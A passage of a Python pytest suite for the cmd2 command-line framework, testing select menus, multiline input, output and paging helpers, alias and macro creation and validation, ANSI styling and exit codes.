# Mock out the read_input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'bacon'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
{} with salty sauce, yum!
""".format(food))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Sauce? ')
# And verify the expected output to stdout
assert out == expected
def test_select_invalid_option_too_big(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input')
# If side_effect is an iterable then each call to the mock will return the next value from the iterable.
read_input_mock.side_effect = ['3', '1'] # First pass an invalid selection, then pass a valid one
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
'3' isn't a valid choice. Pick a number between 1 and 2:
{} with sweet sauce, yum!
""".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
# And verify the expected output to stdout
assert out == expected
def test_select_invalid_option_too_small(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input')
# If side_effect is an iterable then each call to the mock will return the next value from the iterable.
read_input_mock.side_effect = ['0', '1'] # First pass an invalid selection, then pass a valid one
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
'0' isn't a valid choice. Pick a number between 1 and 2:
{} with sweet sauce, yum!
""".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
# And verify the expected output to stdout
assert out == expected
def test_select_list_of_strings(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "study")
expected = normalize("""
1. math
2. science
Good luck learning {}!
""".format('science'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Subject? ')
# And verify the expected output to stdout
assert out == expected
def test_select_list_of_tuples(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "procrastinate")
expected = normalize("""
1. Netflix
2. WebSurfing
Have fun procrasinating with {}!
""".format('YouTube'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('How would you like to procrastinate? ')
# And verify the expected output to stdout
assert out == expected
def test_select_uneven_list_of_tuples(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "play")
expected = normalize("""
1. Electric Guitar
2. Drums
Charm us with the {}...
""".format('Drums'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Instrument? ')
# And verify the expected output to stdout
assert out == expected
def test_select_eof(select_app, monkeypatch):
# Ctrl-D during select causes an EOFError that just reprompts the user
read_input_mock = mock.MagicMock(name='read_input', side_effect=[EOFError, 2])
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
def test_select_ctrl_c(outsim_app, monkeypatch, capsys):
# Ctrl-C during select prints ^C and raises a KeyboardInterrupt
read_input_mock = mock.MagicMock(name='read_input', side_effect=KeyboardInterrupt)
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
with pytest.raises(KeyboardInterrupt):
outsim_app.select([('Guitar', 'Electric Guitar'), ('Drums',)], 'Instrument? ')
out = outsim_app.stdout.getvalue()
assert out.rstrip().endswith('^C')
class HelpNoDocstringApp(cmd2.Cmd):
greet_parser = argparse.ArgumentParser()
greet_parser.add_argument('-s', '--shout', action="store_true", help="N00B EMULATION MODE")
@cmd2.with_argparser(greet_parser, with_unknown_args=True)
def do_greet(self, opts, arg):
arg = ''.join(arg)
if opts.shout:
arg = arg.upper()
self.stdout.write(arg + '\n')
def test_help_with_no_docstring(capsys):
app = HelpNoDocstringApp()
app.onecmd_plus_hooks('greet -h')
out, err = capsys.readouterr()
assert err == ''
assert out == """usage: greet [-h] [-s]
optional arguments:
-h, --help show this help message and exit
-s, --shout N00B EMULATION MODE
"""
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="utils.which function only used on Mac and Linux")
def test_which_editor_good():
editor = cmd2.Cmd.DEFAULT_EDITOR
path = utils.which(editor)
# Assert that the editor was found because some editor should exist on all Mac and Linux systems
assert path
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="utils.which function only used on Mac and Linux")
def test_which_editor_bad():
nonexistent_editor = 'this_editor_does_not_exist.exe'
path = utils.which(nonexistent_editor)
# Assert that the non-existent editor wasn't found
assert path is None
class MultilineApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, multiline_commands=['orate'], **kwargs)
orate_parser = argparse.ArgumentParser()
orate_parser.add_argument('-s', '--shout', action="store_true", help="N00B EMULATION MODE")
@cmd2.with_argparser(orate_parser, with_unknown_args=True)
def do_orate(self, opts, arg):
arg = ''.join(arg)
if opts.shout:
arg = arg.upper()
self.stdout.write(arg + '\n')
@pytest.fixture
def multiline_app():
app = MultilineApp()
return app
def test_multiline_complete_empty_statement_raises_exception(multiline_app):
with pytest.raises(exceptions.EmptyStatement):
multiline_app._complete_statement('')
def test_multiline_complete_statement_without_terminator(multiline_app):
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', return_value='\n')
builtins.input = m
command = 'orate'
args = 'hello world'
line = '{} {}'.format(command, args)
statement = multiline_app._complete_statement(line)
assert statement == args
assert statement.command == command
assert statement.multiline_command == command
def test_multiline_complete_statement_with_unclosed_quotes(multiline_app):
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', side_effect=['quotes', '" now closed;'])
builtins.input = m
line = 'orate hi "partially open'
statement = multiline_app._complete_statement(line)
assert statement == 'hi "partially open\nquotes\n" now closed'
assert statement.command == 'orate'
assert statement.multiline_command == 'orate'
assert statement.terminator == ';'
def test_multiline_input_line_to_statement(multiline_app):
# Verify _input_line_to_statement saves the fully entered input line for multiline commands
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', side_effect=['person', '\n'])
builtins.input = m
line = 'orate hi'
statement = multiline_app._input_line_to_statement(line)
assert statement.raw == 'orate hi\nperson\n'
assert statement == 'hi person'
assert statement.command == 'orate'
assert statement.multiline_command == 'orate'
def test_clipboard_failure(base_app, capsys):
# Force cmd2 clipboard to be disabled
base_app._can_clip = False
# Redirect command output to the clipboard when a clipboard isn't present
base_app.onecmd_plus_hooks('help > ')
# Make sure we got the error output
out, err = capsys.readouterr()
assert out == ''
assert 'Cannot redirect to paste buffer;' in err and 'pyperclip' in err
class CommandResultApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_affirmative(self, arg):
self.last_result = cmd2.CommandResult(arg, data=True)
def do_negative(self, arg):
self.last_result = cmd2.CommandResult(arg, data=False)
def do_affirmative_no_data(self, arg):
self.last_result = cmd2.CommandResult(arg)
def do_negative_no_data(self, arg):
self.last_result = cmd2.CommandResult('', arg)
@pytest.fixture
def commandresult_app():
app = CommandResultApp()
return app
def test_commandresult_truthy(commandresult_app):
arg = 'foo'
run_cmd(commandresult_app, 'affirmative {}'.format(arg))
assert commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg, data=True)
run_cmd(commandresult_app, 'affirmative_no_data {}'.format(arg))
assert commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg)
def test_commandresult_falsy(commandresult_app):
arg = 'bar'
run_cmd(commandresult_app, 'negative {}'.format(arg))
assert not commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg, data=False)
run_cmd(commandresult_app, 'negative_no_data {}'.format(arg))
assert not commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult('', arg)
def test_is_text_file_bad_input(base_app):
# Test with a non-existent file
file_is_valid = utils.is_text_file('does_not_exist.txt')
assert not file_is_valid
# Test with a directory
dir_is_valid = utils.is_text_file('.')
assert not dir_is_valid
def test_eof(base_app):
# Only thing to verify is that it returns True
assert base_app.do_eof('')
def test_echo(capsys):
app = cmd2.Cmd()
app.echo = True
commands = ['help history']
app.runcmds_plus_hooks(commands)
out, err = capsys.readouterr()
assert out.startswith('{}{}\n'.format(app.prompt, commands[0]) + HELP_HISTORY.split()[0])
def test_read_input_rawinput_true(capsys, monkeypatch):
prompt_str = 'the_prompt'
input_str = 'some input'
app = cmd2.Cmd()
app.use_rawinput = True
# Mock out input() to return input_str
monkeypatch.setattr("builtins.input", lambda *args: input_str)
# isatty is True
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=True)):
line = app.read_input(prompt_str)
assert line == input_str
# isatty is False
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=False)):
# echo True
app.echo = True
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == "{}{}\n".format(prompt_str, input_str)
# echo False
app.echo = False
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert not out
def test_read_input_rawinput_false(capsys, monkeypatch):
prompt_str = 'the_prompt'
input_str = 'some input'
def make_app(isatty: bool, empty_input: bool = False):
"""Make a cmd2 app with a custom stdin"""
app_input_str = '' if empty_input else input_str
fakein = io.StringIO('{}'.format(app_input_str))
fakein.isatty = mock.MagicMock(name='isatty', return_value=isatty)
new_app = cmd2.Cmd(stdin=fakein)
new_app.use_rawinput = False
return new_app
# isatty True
app = make_app(isatty=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == prompt_str
# isatty True, empty input
app = make_app(isatty=True, empty_input=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == 'eof'
assert out == prompt_str
# isatty is False, echo is True
app = make_app(isatty=False)
app.echo = True
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == "{}{}\n".format(prompt_str, input_str)
# isatty is False, echo is False
app = make_app(isatty=False)
app.echo = False
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert not out
# isatty is False, empty input
app = make_app(isatty=False, empty_input=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == 'eof'
assert not out
def test_read_command_line_eof(base_app, monkeypatch):
read_input_mock = mock.MagicMock(name='read_input', side_effect=EOFError)
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
line = base_app._read_command_line("Prompt> ")
assert line == 'eof'
def test_poutput_string(outsim_app):
msg = 'This is a test'
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = msg + '\n'
assert out == expected
def test_poutput_zero(outsim_app):
msg = 0
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = str(msg) + '\n'
assert out == expected
def test_poutput_empty_string(outsim_app):
msg = ''
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = '\n'
assert out == expected
def test_poutput_none(outsim_app):
msg = None
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = 'None\n'
assert out == expected
def test_poutput_ansi_always(outsim_app):
msg = 'Hello World'
ansi.allow_style = ansi.STYLE_ALWAYS
colored_msg = ansi.style(msg, fg='cyan')
outsim_app.poutput(colored_msg)
out = outsim_app.stdout.getvalue()
expected = colored_msg + '\n'
assert colored_msg != msg
assert out == expected
def test_poutput_ansi_never(outsim_app):
msg = 'Hello World'
ansi.allow_style = ansi.STYLE_NEVER
colored_msg = ansi.style(msg, fg='cyan')
outsim_app.poutput(colored_msg)
out = outsim_app.stdout.getvalue()
expected = msg + '\n'
assert colored_msg != msg
assert out == expected
# These are invalid names for aliases and macros
invalid_command_name = [
'""', # Blank name
constants.COMMENT_CHAR,
'!no_shortcut',
'">"',
'"no>pe"',
'"no spaces"',
'"nopipe|"',
'"noterm;"',
'noembedded"quotes',
]
def test_get_alias_completion_items(base_app):
run_cmd(base_app, 'alias create fake run_pyscript')
run_cmd(base_app, 'alias create ls !ls -hal')
results = base_app._get_alias_completion_items()
assert len(results) == len(base_app.aliases)
for cur_res in results:
assert cur_res in base_app.aliases
assert cur_res.description == base_app.aliases[cur_res]
def test_get_macro_completion_items(base_app):
run_cmd(base_app, 'macro create foo !echo foo')
run_cmd(base_app, 'macro create bar !echo bar')
results = base_app._get_macro_completion_items()
assert len(results) == len(base_app.macros)
for cur_res in results:
assert cur_res in base_app.macros
assert cur_res.description == base_app.macros[cur_res].value
def test_get_settable_completion_items(base_app):
results = base_app._get_settable_completion_items()
for cur_res in results:
assert cur_res in base_app.settables
assert cur_res.description == base_app.settables[cur_res].description
def test_alias_no_subcommand(base_app):
out, err = run_cmd(base_app, 'alias')
assert "Usage: alias [-h]" in err[0]
assert "Error: the following arguments are required: SUBCOMMAND" in err[1]
def test_alias_create(base_app):
# Create the alias
out, err = run_cmd(base_app, 'alias create fake run_pyscript')
assert out == normalize("Alias 'fake' created")
# Use the alias
out, err = run_cmd(base_app, 'fake')
assert "the following arguments are required: script_path" in err[1]
# See a list of aliases
out, err = run_cmd(base_app, 'alias list')
assert out == normalize('alias create fake run_pyscript')
# Look up the new alias
out, err = run_cmd(base_app, 'alias list fake')
assert out == normalize('alias create fake run_pyscript')
def test_alias_create_with_quoted_value(base_app):
"""Demonstrate that quotes in alias value will be preserved (except for redirectors and terminators)"""
# Create the alias
out, err = run_cmd(base_app, 'alias create fake help ">" "out file.txt" ";"')
assert out == normalize("Alias 'fake' created")
# Look up the new alias (Only the redirector should be unquoted)
out, err = run_cmd(base_app, 'alias list fake')
assert out == normalize('alias create fake help > "out file.txt" ;')
@pytest.mark.parametrize('alias_name', invalid_command_name)
def test_alias_create_invalid_name(base_app, alias_name, capsys):
out, err = run_cmd(base_app, 'alias create {} help'.format(alias_name))
assert "Invalid alias name" in err[0]
def test_alias_create_with_command_name(base_app):
out, err = run_cmd(base_app, 'alias create help stuff')
assert "Alias cannot have the same name as a command" in err[0]
def test_alias_create_with_macro_name(base_app):
macro = "my_macro"
run_cmd(base_app, 'macro create {} help'.format(macro))
out, err = run_cmd(base_app, 'alias create {} help'.format(macro))
assert "Alias cannot have the same name as a macro" in err[0]
def test_alias_that_resolves_into_comment(base_app):
# Create the alias
out, err = run_cmd(base_app, 'alias create fake ' + constants.COMMENT_CHAR + ' blah blah')
assert out == normalize("Alias 'fake' created")
# Use the alias
out, err = run_cmd(base_app, 'fake')
assert not out
assert not err
def test_alias_list_invalid_alias(base_app):
# Look up invalid alias
out, err = run_cmd(base_app, 'alias list invalid')
assert "Alias 'invalid' not found" in err[0]
def test_alias_delete(base_app):
# Create an alias
run_cmd(base_app, 'alias create fake run_pyscript')
# Delete the alias
out, err = run_cmd(base_app, 'alias delete fake')
assert out == normalize("Alias 'fake' deleted")
def test_alias_delete_all(base_app):
out, err = run_cmd(base_app, 'alias delete --all')
assert out == normalize("All aliases deleted")
def test_alias_delete_non_existing(base_app):
out, err = run_cmd(base_app, 'alias delete fake')
assert "Alias 'fake' does not exist" in err[0]
def test_alias_delete_no_name(base_app):
out, err = run_cmd(base_app, 'alias delete')
assert "Either --all or alias name(s)" in err[0]
def test_multiple_aliases(base_app):
alias1 = 'h1'
alias2 = 'h2'
run_cmd(base_app, 'alias create {} help'.format(alias1))
run_cmd(base_app, 'alias create {} help -v'.format(alias2))
out, err = run_cmd(base_app, alias1)
verify_help_text(base_app, out)
out, err = run_cmd(base_app, alias2)
verify_help_text(base_app, out)
def test_macro_no_subcommand(base_app):
out, err = run_cmd(base_app, 'macro')
assert "Usage: macro [-h]" in err[0]
assert "Error: the following arguments are required: SUBCOMMAND" in err[1]
def test_macro_create(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake run_pyscript')
assert out == normalize("Macro 'fake' created")
# Use the macro
out, err = run_cmd(base_app, 'fake')
assert "the following arguments are required: script_path" in err[1]
# See a list of macros
out, err = run_cmd(base_app, 'macro list')
assert out == normalize('macro create fake run_pyscript')
# Look up the new macro
out, err = run_cmd(base_app, 'macro list fake')
assert out == normalize('macro create fake run_pyscript')
def test_macro_create_with_quoted_value(base_app):
"""Demonstrate that quotes in macro value will be preserved (except for redirectors and terminators)"""
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help ">" "out file.txt" ";"')
assert out == normalize("Macro 'fake' created")
# Look up the new macro (Only the redirector should be unquoted)
out, err = run_cmd(base_app, 'macro list fake')
assert out == normalize('macro create fake help > "out file.txt" ;')
@pytest.mark.parametrize('macro_name', invalid_command_name)
def test_macro_create_invalid_name(base_app, macro_name):
out, err = run_cmd(base_app, 'macro create {} help'.format(macro_name))
assert "Invalid macro name" in err[0]
def test_macro_create_with_command_name(base_app):
out, err = run_cmd(base_app, 'macro create help stuff')
assert "Macro cannot have the same name as a command" in err[0]
def test_macro_create_with_alias_name(base_app):
macro = "my_macro"
run_cmd(base_app, 'alias create {} help'.format(macro))
out, err = run_cmd(base_app, 'macro create {} help'.format(macro))
assert "Macro cannot have the same name as an alias" in err[0]
def test_macro_create_with_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake {1} {2}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake help -v')
verify_help_text(base_app, out)
def test_macro_create_with_escaped_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {{1}}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake')
assert err[0].startswith('No help on {1}')
def test_macro_usage_with_missing_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {2}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake arg1')
assert "expects at least 2 argument(s)" in err[0]
def test_macro_usage_with_exta_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake alias create')
assert "Usage: alias create" in out[0]
def test_macro_create_with_missing_arg_nums(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {3}')
assert "Not all numbers between 1 and 3" in err[0]
def test_macro_create_with_invalid_arg_num(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {-1} {0}')
assert "Argument numbers must be greater than 0" in err[0]
def test_macro_create_with_unicode_numbered_arg(base_app):
# Create the macro expecting 1 argument
out, err = run_cmd(base_app, 'macro create fake help {\N{ARABIC-INDIC DIGIT ONE}}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake')
assert "expects at least 1 argument(s)" in err[0]
def test_macro_create_with_missing_unicode_arg_nums(base_app):
out, err = run_cmd(base_app, 'macro create fake help {1} {\N{ARABIC-INDIC DIGIT THREE}}')
assert "Not all numbers between 1 and 3" in err[0]
def test_macro_that_resolves_into_comment(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake {1} blah blah')
assert out == normalize("Macro 'fake' created")
# Use the macro
out, err = run_cmd(base_app, 'fake ' + constants.COMMENT_CHAR)
assert not out
assert not err
def test_macro_list_invalid_macro(base_app):
# Look up invalid macro
out, err = run_cmd(base_app, 'macro list invalid')
assert "Macro 'invalid' not found" in err[0]
def test_macro_delete(base_app):
# Create an macro
run_cmd(base_app, 'macro create fake run_pyscript')
# Delete the macro
out, err = run_cmd(base_app, 'macro delete fake')
assert out == normalize("Macro 'fake' deleted")
def test_macro_delete_all(base_app):
out, err = run_cmd(base_app, 'macro delete --all')
assert out == normalize("All macros deleted")
def test_macro_delete_non_existing(base_app):
out, err = run_cmd(base_app, 'macro delete fake')
assert "Macro 'fake' does not exist" in err[0]
def test_macro_delete_no_name(base_app):
out, err = run_cmd(base_app, 'macro delete')
assert "Either --all or macro name(s)" in err[0]
def test_multiple_macros(base_app):
macro1 = 'h1'
macro2 = 'h2'
run_cmd(base_app, 'macro create {} help'.format(macro1))
run_cmd(base_app, 'macro create {} help -v'.format(macro2))
out, err = run_cmd(base_app, macro1)
verify_help_text(base_app, out)
out2, err2 = run_cmd(base_app, macro2)
verify_help_text(base_app, out2)
assert len(out2) > len(out)
def test_nonexistent_macro(base_app):
from cmd2.parsing import StatementParser
exception = None
try:
base_app._resolve_macro(StatementParser().parse('fake'))
except KeyError as e:
exception = e
assert exception is not None
def test_perror_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_ALWAYS
base_app.perror(msg)
out, err = capsys.readouterr()
assert err == ansi.style_error(msg) + end
def test_perror_no_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_ALWAYS
base_app.perror(msg, apply_style=False)
out, err = capsys.readouterr()
assert err == msg + end
def test_pwarning_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_ALWAYS
base_app.pwarning(msg)
out, err = capsys.readouterr()
assert err == ansi.style_warning(msg) + end
def test_pwarning_no_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_ALWAYS
base_app.pwarning(msg, apply_style=False)
out, err = capsys.readouterr()
assert err == msg + end
def test_ppaged(outsim_app):
msg = 'testing...'
end = '\n'
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert out == msg + end
def test_ppaged_blank(outsim_app):
msg = ''
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert not out
def test_ppaged_none(outsim_app):
msg = None
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert not out
def test_ppaged_strips_ansi_when_redirecting(outsim_app):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_TERMINAL
outsim_app._redirecting = True
outsim_app.ppaged(ansi.style(msg, fg='red'))
out = outsim_app.stdout.getvalue()
assert out == msg + end
def test_ppaged_strips_ansi_when_redirecting_if_always(outsim_app):
msg = 'testing...'
end = '\n'
ansi.allow_style = ansi.STYLE_ALWAYS
outsim_app._redirecting = True
colored_msg = ansi.style(msg, fg='red')
outsim_app.ppaged(colored_msg)
out = outsim_app.stdout.getvalue()
assert out == colored_msg + end
# we override cmd.parseline() so we always get consistent
# command parsing by parent methods we don't override
# don't need to test all the parsing logic here, because
# parseline just calls StatementParser.parse_command_only()
def test_parseline_empty(base_app):
statement = ''
command, args, line = base_app.parseline(statement)
assert not command
assert not args
assert not line
def test_parseline(base_app):
statement = " command with 'partially completed quotes "
command, args, line = base_app.parseline(statement)
assert command == 'command'
assert args == "with 'partially completed quotes"
assert line == statement.strip()
def test_onecmd_raw_str_continue(outsim_app):
line = "help"
stop = outsim_app.onecmd(line)
out = outsim_app.stdout.getvalue()
assert not stop
verify_help_text(outsim_app, out)
def test_onecmd_raw_str_quit(outsim_app):
line = "quit"
stop = outsim_app.onecmd(line)
out = outsim_app.stdout.getvalue()
assert stop
assert out == ''
def test_onecmd_add_to_history(outsim_app):
line = "help"
saved_hist_len = len(outsim_app.history)
# Allow command to be added to history
outsim_app.onecmd(line, add_to_history=True)
new_hist_len = len(outsim_app.history)
assert new_hist_len == saved_hist_len + 1
saved_hist_len = new_hist_len
# Prevent command from being added to history
outsim_app.onecmd(line, add_to_history=False)
new_hist_len = len(outsim_app.history)
assert new_hist_len == saved_hist_len
def test_get_all_commands(base_app):
# Verify that the base app has the expected commands
commands = base_app.get_all_commands()
expected_commands = ['_relative_run_script', 'alias', 'edit', 'eof', 'help', 'history', 'macro',
'py', 'quit', 'run_pyscript', 'run_script', 'set', 'shell', 'shortcuts']
assert commands == expected_commands
def test_get_help_topics(base_app):
# Verify that the base app has no additional help_foo methods
custom_help = base_app.get_help_topics()
assert len(custom_help) == 0
def test_get_help_topics_hidden():
# Verify get_help_topics() filters out hidden commands
class TestApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_my_cmd(self, args):
pass
def help_my_cmd(self, args):
pass
app = TestApp()
assert 'my_cmd' in app.get_help_topics()
app.hidden_commands.append('my_cmd')
assert 'my_cmd' not in app.get_help_topics()
class ReplWithExitCode(cmd2.Cmd):
""" Example cmd2 application where we can specify an exit code when existing."""
def __init__(self):
super().__init__(allow_cli_args=False)
@cmd2.with_argument_list
def do_exit(self, arg_list) -> bool:
"""Exit the application with an optional exit code.
Usage: exit [exit_code]
Where:
* exit_code - integer exit code to return to the shell
"""
# If an argument was provided
if arg_list:
try:
self.exit_code = int(arg_list[0])
except ValueError:
self.perror("{} isn't a valid integer exit code".format(arg_list[0]))
self.exit_code = -1
# Return True to stop the command loop
return True
def postloop(self) -> None:
"""Hook method executed once when the cmdloop() method is about to return."""
self.poutput('exiting with code: {}'.format(self.exit_code))
@pytest.fixture
def exit_code_repl():
app = ReplWithExitCode()
app.stdout = utils.StdSim(app.stdout)
return app
def test_exit_code_default(exit_code_repl):
app = exit_code_repl
app.use_rawinput = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='exit')
builtins.input = m
expected = 'exiting with code: 0\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
def test_exit_code_nonzero(exit_code_repl):
app = exit_code_repl
app.use_rawinput = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='exit 23')
builtins.input = m
expected = 'exiting with code: 23\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
class AnsiApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_echo(self, args):
self.poutput(args)
self.perror(args)
def do_echo_error(self, args):
self.poutput(ansi.style(args, fg='red'))
# perror uses colors by default
self.perror(args)
def test_ansi_pouterr_always_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_ALWAYS
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
# if colors are on, the output should have some ANSI style sequences in it
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
# errors always have colors
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_pouterr_always_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_ALWAYS
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
# if colors are on, the output should have some ANSI style sequences in it
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
# errors always have colors
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_terminal_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_TERMINAL
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
# if colors are on, the output should have some ANSI style sequences in it
out, err = capsys.readouterr()
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_terminal_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_TERMINAL
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
def test_ansi_never_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_NEVER
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
def test_ansi_never_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_NEVER
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
